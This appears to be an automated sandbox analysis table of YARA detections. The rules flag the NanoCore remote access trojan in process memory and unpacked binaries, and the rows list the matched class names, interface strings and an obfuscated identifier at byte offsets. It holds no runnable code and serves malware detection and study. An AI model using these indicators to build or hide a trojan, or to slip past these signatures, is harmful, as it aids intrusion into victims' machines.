Process Memory Space: boaliim.dat PID: 7512	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x8a9c6:$a: NanoCore 0x8a9d6:$a: NanoCore 0x8aa95:$a: NanoCore 0x8aaa4:$a: NanoCore 0x8aca5:$a: NanoCore 0x8acb9:$a: NanoCore 0x8acf9:$a: NanoCore 0x95f17:$a: NanoCore 0x95f29:$a: NanoCore 0x95f65:$a: NanoCore 0x171fad:$a: NanoCore 0x171fbd:$a: NanoCore 0x17207c:$a: NanoCore 0x17208b:$a: NanoCore 0x17228c:$a: NanoCore 0x1722a0:$a: NanoCore 0x1722e0:$a: NanoCore 0x17d4fe:$a: NanoCore 0x17d510:$a: NanoCore 0x17d54c:$a: NanoCore 0x1895dc:$a: NanoCore
Process Memory Space: boaliim.dat PID: 7512	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x8acf9:$a1: NanoCore.ClientPluginHost 0x1722e0:$a1: NanoCore.ClientPluginHost 0x195d2d:$a1: NanoCore.ClientPluginHost 0x67a8ae:$a1: NanoCore.ClientPluginHost 0x76cf40:$a1: NanoCore.ClientPluginHost 0x80794f:$a1: NanoCore.ClientPluginHost 0x88ffe8:$a1: NanoCore.ClientPluginHost 0x8acb9:$a2: NanoCore.ClientPlugin 0x1722a0:$a2: NanoCore.ClientPlugin 0x195ced:$a2: NanoCore.ClientPlugin 0x67a86e:$a2: NanoCore.ClientPlugin 0x76cf00:$a2: NanoCore.ClientPlugin 0x80790f:$a2: NanoCore.ClientPlugin 0x88ffa8:$a2: NanoCore.ClientPlugin 0x8cbd0:$b1: get_BuilderSettings 0x1741b7:$b1: get_BuilderSettings 0x197c04:$b1: get_BuilderSettings 0x67c785:$b1: get_BuilderSettings 0x76ee17:$b1: get_BuilderSettings 0x809826:$b1: get_BuilderSettings 0x891ebf:$b1: get_BuilderSettings
Process Memory Space: RegSvcs.exe PID: 7772	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x503e:$x1: NanoCore.ClientPluginHost 0xc7db:$x1: NanoCore.ClientPluginHost 0x322f9:$x1: NanoCore.ClientPluginHost 0x4c0e8:$x1: NanoCore.ClientPluginHost 0x6d919:$x1: NanoCore.ClientPluginHost 0x7523b:$x1: NanoCore.ClientPluginHost 0x90c4d:$x1: NanoCore.ClientPluginHost 0xd22ad:$x1: NanoCore.ClientPluginHost 0xf5d27:$x1: NanoCore.ClientPluginHost 0xfb511:$x1: NanoCore.ClientPluginHost 0x112288:$x1: NanoCore.ClientPluginHost 0x11678b:$x1: NanoCore.ClientPluginHost 0x1306b0:$x1: NanoCore.ClientPluginHost 0x13aac9:$x1: NanoCore.ClientPluginHost 0x140734:$x1: NanoCore.ClientPluginHost 0x14ec21:$x1: NanoCore.ClientPluginHost 0x1cd1c3:$x1: NanoCore.ClientPluginHost 0x1d9060:$x1: NanoCore.ClientPluginHost 0x1e8df5:$x1: NanoCore.ClientPluginHost 0x1fcf02:$x1: NanoCore.ClientPluginHost 0x218805:$x1: NanoCore.ClientPluginHost
Process Memory Space: RegSvcs.exe PID: 7772	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 7772	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x503e:$a: NanoCore 0x50b8:$a: NanoCore 0x5e87:$a: NanoCore 0x5efa:$a: NanoCore 0xc7b2:$a: NanoCore 0xc7db:$a: NanoCore 0x1135c:$a: NanoCore 0x11383:$a: NanoCore 0x23303:$a: NanoCore 0x233e9:$a: NanoCore 0x2376f:$a: NanoCore 0x322b8:$a: NanoCore 0x322d0:$a: NanoCore 0x322f9:$a: NanoCore 0x370f1:$a: NanoCore 0x37107:$a: NanoCore 0x3712e:$a: NanoCore 0x418c0:$a: NanoCore 0x4191b:$a: NanoCore 0x4198e:$a: NanoCore 0x4c052:$a: NanoCore
Process Memory Space: RegSvcs.exe PID: 7772	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x503e:$a1: NanoCore.ClientPluginHost 0xc7db:$a1: NanoCore.ClientPluginHost 0x322f9:$a1: NanoCore.ClientPluginHost 0x4c0e8:$a1: NanoCore.ClientPluginHost 0x6d919:$a1: NanoCore.ClientPluginHost 0x7523b:$a1: NanoCore.ClientPluginHost 0x90c4d:$a1: NanoCore.ClientPluginHost 0xd22ad:$a1: NanoCore.ClientPluginHost 0xf5d27:$a1: NanoCore.ClientPluginHost 0xfb511:$a1: NanoCore.ClientPluginHost 0x112288:$a1: NanoCore.ClientPluginHost 0x11678b:$a1: NanoCore.ClientPluginHost 0x1306b0:$a1: NanoCore.ClientPluginHost 0x13aac9:$a1: NanoCore.ClientPluginHost 0x140734:$a1: NanoCore.ClientPluginHost 0x14ec21:$a1: NanoCore.ClientPluginHost 0x1cd1c3:$a1: NanoCore.ClientPluginHost 0x1d9060:$a1: NanoCore.ClientPluginHost 0x1e8df5:$a1: NanoCore.ClientPluginHost 0x1fcf02:$a1: NanoCore.ClientPluginHost 0x218805:$a1: NanoCore.ClientPluginHost
Click to see the 110 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
13.2.RegSvcs.exe.3850378.3.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x2dbb:$x1: NanoCore.ClientPluginHost 0x2de5:$x2: IClientNetworkHost
13.2.RegSvcs.exe.3850378.3.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0x2dbb:$x2: NanoCore.ClientPluginHost 0x4c6b:$s4: PipeCreated
13.2.RegSvcs.exe.3850378.3.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x2d96:$x2: NanoCore.ClientPlugin 0x2dbb:$x3: NanoCore.ClientPluginHost 0x2d87:$i3: IClientNetwork 0x2dac:$i4: IClientAppHost 0x2dd5:$i5: IClientDataHost 0x2de5:$i7: IClientNetworkHost 0x2df8:$i9: IClientNameObjectCollection 0x2e1d:$i10: IClientReadOnlyNameObjectCollection 0x2bce:$s1: ClientPlugin 0x2d9f:$s1: ClientPlugin
13.2.RegSvcs.exe.3850378.3.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x2dbb:$a1: NanoCore.ClientPluginHost 0x2d96:$a2: NanoCore.ClientPlugin 0x6758:$b1: get_BuilderSettings 0x2dac:$b4: IClientAppHost
13.2.RegSvcs.exe.7b00000.27.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x5b99:$x1: NanoCore.ClientPluginHost 0x5bb3:$x2: IClientNetworkHost
13.2.RegSvcs.exe.7b00000.27.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0x5b99:$x2: NanoCore.ClientPluginHost 0x6bce:$s4: PipeCreated 0x5b86:$s5: IClientLoggingHost
13.2.RegSvcs.exe.7b00000.27.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x5b70:$x2: NanoCore.ClientPlugin 0x5b99:$x3: NanoCore.ClientPluginHost 0x5b61:$i3: IClientNetwork 0x5b86:$i6: IClientLoggingHost 0x5bb3:$i7: IClientNetworkHost 0x59d4:$s1: ClientPlugin 0x5b79:$s1: ClientPlugin 0x5e84:$s2: EndPoint 0x5e8d:$s3: IPAddress 0x5e97:$s4: IPEndPoint
13.2.RegSvcs.exe.7b00000.27.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x5b99:$a1: NanoCore.ClientPluginHost 0x5b70:$a2: NanoCore.ClientPlugin 0x5b86:$b9: IClientLoggingHost
13.2.RegSvcs.exe.7b30000.29.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x1f1db:$x1: NanoCore.ClientPluginHost 0x1f1f5:$x2: IClientNetworkHost
13.2.RegSvcs.exe.7b30000.29.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0x1f1db:$x2: NanoCore.ClientPluginHost 0x22518:$s4: PipeCreated 0x1f1c8:$s5: IClientLoggingHost
13.2.RegSvcs.exe.7b30000.29.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x1f1b2:$x2: NanoCore.ClientPlugin 0x1f1db:$x3: NanoCore.ClientPluginHost 0x1f1a3:$i3: IClientNetwork 0x1f1c8:$i6: IClientLoggingHost 0x1f1f5:$i7: IClientNetworkHost 0x1f208:$i8: IClientUIHost 0x1ef12:$s1: ClientPlugin 0x1f1bb:$s1: ClientPlugin
13.2.RegSvcs.exe.7b30000.29.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x1f1db:$a1: NanoCore.ClientPluginHost 0x1f1b2:$a2: NanoCore.ClientPlugin 0x24206:$b7: LogClientException 0x1f1c8:$b9: IClientLoggingHost
13.2.RegSvcs.exe.7ae0000.26.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x1deb:$x1: NanoCore.ClientPluginHost 0x1e24:$x2: IClientNetworkHost
13.2.RegSvcs.exe.7ae0000.26.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0x1deb:$x2: NanoCore.ClientPluginHost 0x1f36:$s4: PipeCreated 0x1e05:$s5: IClientLoggingHost
13.2.RegSvcs.exe.7ae0000.26.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x1e8b:$x2: NanoCore.ClientPlugin 0x1deb:$x3: NanoCore.ClientPluginHost 0x1ea1:$i3: IClientNetwork 0x1e43:$i5: IClientDataHost 0x1e05:$i6: IClientLoggingHost 0x1e24:$i7: IClientNetworkHost 0x266c:$i9: IClientNameObjectCollection 0x1b41:$s1: ClientPlugin 0x1e94:$s1: ClientPlugin 0x2a80:$s2: EndPoint 0x2771:$s3: IPAddress 0x2083:$s4: IPEndPoint 0x27a3:$s7: get_Connected
13.2.RegSvcs.exe.7ae0000.26.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x1deb:$a1: NanoCore.ClientPluginHost 0x1e8b:$a2: NanoCore.ClientPlugin 0x2be1:$b7: LogClientException 0x1e05:$b9: IClientLoggingHost
13.2.RegSvcs.exe.6d10000.18.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
13.2.RegSvcs.exe.6d10000.18.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
13.2.RegSvcs.exe.6d10000.18.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
13.2.RegSvcs.exe.6d10000.18.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xf778:$x2: NanoCore.ClientPlugin 0xf7ad:$x3: NanoCore.ClientPluginHost 0xf76c:$i2: IClientData 0xf78e:$i3: IClientNetwork 0xf79d:$i5: IClientDataHost 0xf7c7:$i6: IClientLoggingHost 0xf7da:$i7: IClientNetworkHost 0xf7ed:$i8: IClientUIHost 0xf7fb:$i9: IClientNameObjectCollection 0xf817:$i10: IClientReadOnlyNameObjectCollection 0xf56a:$s1: ClientPlugin 0xf781:$s1: ClientPlugin 0x147a2:$s6: get_ClientSettings
13.2.RegSvcs.exe.6d10000.18.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xf7ad:$a1: NanoCore.ClientPluginHost 0xf778:$a2: NanoCore.ClientPlugin 0x146f3:$b1: get_BuilderSettings 0x14662:$b7: LogClientException 0xf7c7:$b9: IClientLoggingHost
13.2.RegSvcs.exe.7ab0000.23.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x605:$x1: NanoCore.ClientPluginHost 0x63e:$x2: IClientNetworkHost
13.2.RegSvcs.exe.7ab0000.23.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0x605:$x2: NanoCore.ClientPluginHost 0x720:$s4: PipeCreated 0x61f:$s5: IClientLoggingHost
13.2.RegSvcs.exe.7ab0000.23.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x67f:$x2: NanoCore.ClientPlugin 0x605:$x3: NanoCore.ClientPluginHost 0x695:$i3: IClientNetwork 0x61f:$i6: IClientLoggingHost 0x63e:$i7: IClientNetworkHost 0x688:$s1: ClientPlugin
13.2.RegSvcs.exe.7ab0000.23.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x605:$a1: NanoCore.ClientPluginHost 0x67f:$a2: NanoCore.ClientPlugin 0xda0:$b7: LogClientException 0x61f:$b9: IClientLoggingHost
13.2.RegSvcs.exe.7aa0000.22.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x5b0b:$x1: NanoCore.ClientPluginHost 0x5b44:$x2: IClientNetworkHost
13.2.RegSvcs.exe.7aa0000.22.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0x5b0b:$x2: NanoCore.ClientPluginHost 0x5c0f:$s4: PipeCreated 0x5b25:$s5: IClientLoggingHost
13.2.RegSvcs.exe.7aa0000.22.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x5b87:$x2: NanoCore.ClientPlugin 0x5b0b:$x3: NanoCore.ClientPluginHost 0x5b9d:$i3: IClientNetwork 0x5b25:$i6: IClientLoggingHost 0x5b44:$i7: IClientNetworkHost 0x57fb:$s1: ClientPlugin 0x5b90:$s1: ClientPlugin 0x6cf4:$s3: IPAddress
13.2.RegSvcs.exe.7aa0000.22.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x5b0b:$a1: NanoCore.ClientPluginHost 0x5b87:$a2: NanoCore.ClientPlugin 0x6710:$b7: LogClientException 0x5b25:$b9: IClientLoggingHost
13.2.RegSvcs.exe.7aa0000.22.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x3f0b:$x1: NanoCore.ClientPluginHost 0x3f44:$x2: IClientNetworkHost
13.2.RegSvcs.exe.7aa0000.22.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0x3f0b:$x2: NanoCore.ClientPluginHost 0x400f:$s4: PipeCreated 0x3f25:$s5: IClientLoggingHost
13.2.RegSvcs.exe.7aa0000.22.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x3f87:$x2: NanoCore.ClientPlugin 0x3f0b:$x3: NanoCore.ClientPluginHost 0x3f9d:$i3: IClientNetwork 0x3f25:$i6: IClientLoggingHost 0x3f44:$i7: IClientNetworkHost 0x3bfb:$s1: ClientPlugin 0x3f90:$s1: ClientPlugin 0x50f4:$s3: IPAddress
13.2.RegSvcs.exe.7aa0000.22.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x3f0b:$a1: NanoCore.ClientPluginHost 0x3f87:$a2: NanoCore.ClientPlugin 0x4b10:$b7: LogClientException 0x3f25:$b9: IClientLoggingHost
13.2.RegSvcs.exe.6d14629.17.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0xb184:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost
13.2.RegSvcs.exe.6d14629.17.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0xb184:$x2: NanoCore.ClientPluginHost 0xc25f:$s4: PipeCreated 0xb19e:$s5: IClientLoggingHost
13.2.RegSvcs.exe.6d14629.17.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
13.2.RegSvcs.exe.6d14629.17.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xb14f:$x2: NanoCore.ClientPlugin 0xb184:$x3: NanoCore.ClientPluginHost 0xb143:$i2: IClientData 0xb165:$i3: IClientNetwork 0xb174:$i5: IClientDataHost 0xb19e:$i6: IClientLoggingHost 0xb1b1:$i7: IClientNetworkHost 0xb1c4:$i8: IClientUIHost 0xb1d2:$i9: IClientNameObjectCollection 0xb1ee:$i10: IClientReadOnlyNameObjectCollection 0xaf41:$s1: ClientPlugin 0xb158:$s1: ClientPlugin 0x10179:$s6: get_ClientSettings
13.2.RegSvcs.exe.6d14629.17.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xb184:$a1: NanoCore.ClientPluginHost 0xb14f:$a2: NanoCore.ClientPlugin 0x100ca:$b1: get_BuilderSettings 0x10039:$b7: LogClientException 0xb19e:$b9: IClientLoggingHost
13.2.RegSvcs.exe.4982365.11.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
13.2.RegSvcs.exe.4982365.11.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
13.2.RegSvcs.exe.4982365.11.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
13.2.RegSvcs.exe.4982365.11.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xd978:$x2: NanoCore.ClientPlugin 0xd9ad:$x3: NanoCore.ClientPluginHost 0xd96c:$i2: IClientData 0xd98e:$i3: IClientNetwork 0xd99d:$i5: IClientDataHost 0xd9c7:$i6: IClientLoggingHost 0xd9da:$i7: IClientNetworkHost 0xd9ed:$i8: IClientUIHost 0xd9fb:$i9: IClientNameObjectCollection 0xda17:$i10: IClientReadOnlyNameObjectCollection 0xd76a:$s1: ClientPlugin 0xd981:$s1: ClientPlugin 0x129a2:$s6: get_ClientSettings
13.2.RegSvcs.exe.4982365.11.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xd9ad:$a1: NanoCore.ClientPluginHost 0xd978:$a2: NanoCore.ClientPlugin 0x128f3:$b1: get_BuilderSettings 0x12862:$b7: LogClientException 0xd9c7:$b9: IClientLoggingHost
13.2.RegSvcs.exe.4b032d9.9.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x2dbb:$x1: NanoCore.ClientPluginHost 0x2de5:$x2: IClientNetworkHost
13.2.RegSvcs.exe.4b032d9.9.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0x2dbb:$x2: NanoCore.ClientPluginHost 0x4c6b:$s4: PipeCreated
13.2.RegSvcs.exe.4b032d9.9.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x2d96:$x2: NanoCore.ClientPlugin 0x2dbb:$x3: NanoCore.ClientPluginHost 0x2d87:$i3: IClientNetwork 0x2dac:$i4: IClientAppHost 0x2dd5:$i5: IClientDataHost 0x2de5:$i7: IClientNetworkHost 0x2df8:$i9: IClientNameObjectCollection 0x2e1d:$i10: IClientReadOnlyNameObjectCollection 0x2bce:$s1: ClientPlugin 0x2d9f:$s1: ClientPlugin
13.2.RegSvcs.exe.4b032d9.9.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x2dbb:$a1: NanoCore.ClientPluginHost 0x2d96:$a2: NanoCore.ClientPlugin 0x6758:$b1: get_BuilderSettings 0x2dac:$b4: IClientAppHost
7.3.boaliim.dat.1995c58.1.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
7.3.boaliim.dat.1995c58.1.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
7.3.boaliim.dat.1995c58.1.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
7.3.boaliim.dat.1995c58.1.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xfef5:$x1: NanoCore Client 0xff05:$x1: NanoCore Client 0x1014d:$x2: NanoCore.ClientPlugin 0x1018d:$x3: NanoCore.ClientPluginHost 0x10142:$i1: IClientApp 0x10163:$i2: IClientData 0x1016f:$i3: IClientNetwork 0x1017e:$i4: IClientAppHost 0x101a7:$i5: IClientDataHost 0x101b7:$i6: IClientLoggingHost 0x101ca:$i7: IClientNetworkHost 0x101dd:$i8: IClientUIHost 0x101eb:$i9: IClientNameObjectCollection 0x10207:$i10: IClientReadOnlyNameObjectCollection 0xff54:$s1: ClientPlugin 0x10156:$s1: ClientPlugin 0x1064a:$s2: EndPoint 0x10653:$s3: IPAddress 0x1065d:$s4: IPEndPoint 0x12093:$s6: get_ClientSettings 0x12637:$s7: get_Connected
7.3.boaliim.dat.1995c58.1.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
7.3.boaliim.dat.1995c58.1.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x1018d:$a1: NanoCore.ClientPluginHost 0x1014d:$a2: NanoCore.ClientPlugin 0x120a6:$b1: get_BuilderSettings 0xffa9:$b2: ClientLoaderForm.resources 0x117c6:$b3: PluginCommand 0x1017e:$b4: IClientAppHost 0x1a5fe:$b5: GetBlockHash 0x126fe:$b6: AddHostEntry 0x163f1:$b7: LogClientException 0x1266b:$b8: PipeExists 0x101b7:$b9: IClientLoggingHost
7.3.boaliim.dat.192cc48.3.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
7.3.boaliim.dat.192cc48.3.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
7.3.boaliim.dat.192cc48.3.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
7.3.boaliim.dat.192cc48.3.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xe0f5:$x1: NanoCore Client 0xe105:$x1: NanoCore Client 0xe34d:$x2: NanoCore.ClientPlugin 0xe38d:$x3: NanoCore.ClientPluginHost 0xe342:$i1: IClientApp 0xe363:$i2: IClientData 0xe36f:$i3: IClientNetwork 0xe37e:$i4: IClientAppHost 0xe3a7:$i5: IClientDataHost 0xe3b7:$i6: IClientLoggingHost 0xe3ca:$i7: IClientNetworkHost 0xe3dd:$i8: IClientUIHost 0xe3eb:$i9: IClientNameObjectCollection 0xe407:$i10: IClientReadOnlyNameObjectCollection 0xe154:$s1: ClientPlugin 0xe356:$s1: ClientPlugin 0xe84a:$s2: EndPoint 0xe853:$s3: IPAddress 0xe85d:$s4: IPEndPoint 0x10293:$s6: get_ClientSettings 0x10837:$s7: get_Connected
7.3.boaliim.dat.192cc48.3.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
7.3.boaliim.dat.192cc48.3.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xe38d:$a1: NanoCore.ClientPluginHost 0xe34d:$a2: NanoCore.ClientPlugin 0x102a6:$b1: get_BuilderSettings 0xe1a9:$b2: ClientLoaderForm.resources 0xf9c6:$b3: PluginCommand 0xe37e:$b4: IClientAppHost 0x187fe:$b5: GetBlockHash 0x108fe:$b6: AddHostEntry 0x145f1:$b7: LogClientException 0x1086b:$b8: PipeExists 0xe3b7:$b9: IClientLoggingHost
13.2.RegSvcs.exe.4838611.10.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0xb184:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost
13.2.RegSvcs.exe.4838611.10.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0xb184:$x2: NanoCore.ClientPluginHost 0xc25f:$s4: PipeCreated 0xb19e:$s5: IClientLoggingHost
13.2.RegSvcs.exe.4838611.10.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
13.2.RegSvcs.exe.4838611.10.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xb14f:$x2: NanoCore.ClientPlugin 0xb184:$x3: NanoCore.ClientPluginHost 0xb143:$i2: IClientData 0xb165:$i3: IClientNetwork 0xb174:$i5: IClientDataHost 0xb19e:$i6: IClientLoggingHost 0xb1b1:$i7: IClientNetworkHost 0xb1c4:$i8: IClientUIHost 0xb1d2:$i9: IClientNameObjectCollection 0xb1ee:$i10: IClientReadOnlyNameObjectCollection 0xaf41:$s1: ClientPlugin 0xb158:$s1: ClientPlugin 0x10179:$s6: get_ClientSettings
13.2.RegSvcs.exe.4838611.10.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xb184:$a1: NanoCore.ClientPluginHost 0xb14f:$a2: NanoCore.ClientPlugin 0x100ca:$b1: get_BuilderSettings 0x10039:$b7: LogClientException 0xb19e:$b9: IClientLoggingHost
13.2.RegSvcs.exe.4b0f50d.12.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x6da5:$x1: NanoCore.ClientPluginHost 0x6dd2:$x2: IClientNetworkHost
13.2.RegSvcs.exe.4b0f50d.12.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0x6da5:$x2: NanoCore.ClientPluginHost 0x7d74:$s2: FileCommand 0xc776:$s4: PipeCreated 0x6dbf:$s5: IClientLoggingHost
13.2.RegSvcs.exe.4b0f50d.12.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x6d7f:$x2: NanoCore.ClientPlugin 0x6da5:$x3: NanoCore.ClientPluginHost 0x6d70:$i3: IClientNetwork 0x6d95:$i5: IClientDataHost 0x6dbf:$i6: IClientLoggingHost 0x6dd2:$i7: IClientNetworkHost 0x6de5:$i9: IClientNameObjectCollection 0x6b02:$s1: ClientPlugin 0x6d88:$s1: ClientPlugin
13.2.RegSvcs.exe.4b0f50d.12.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x6da5:$a1: NanoCore.ClientPluginHost 0x6d7f:$a2: NanoCore.ClientPlugin 0x6dbf:$b9: IClientLoggingHost
13.2.RegSvcs.exe.1100000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
13.2.RegSvcs.exe.1100000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
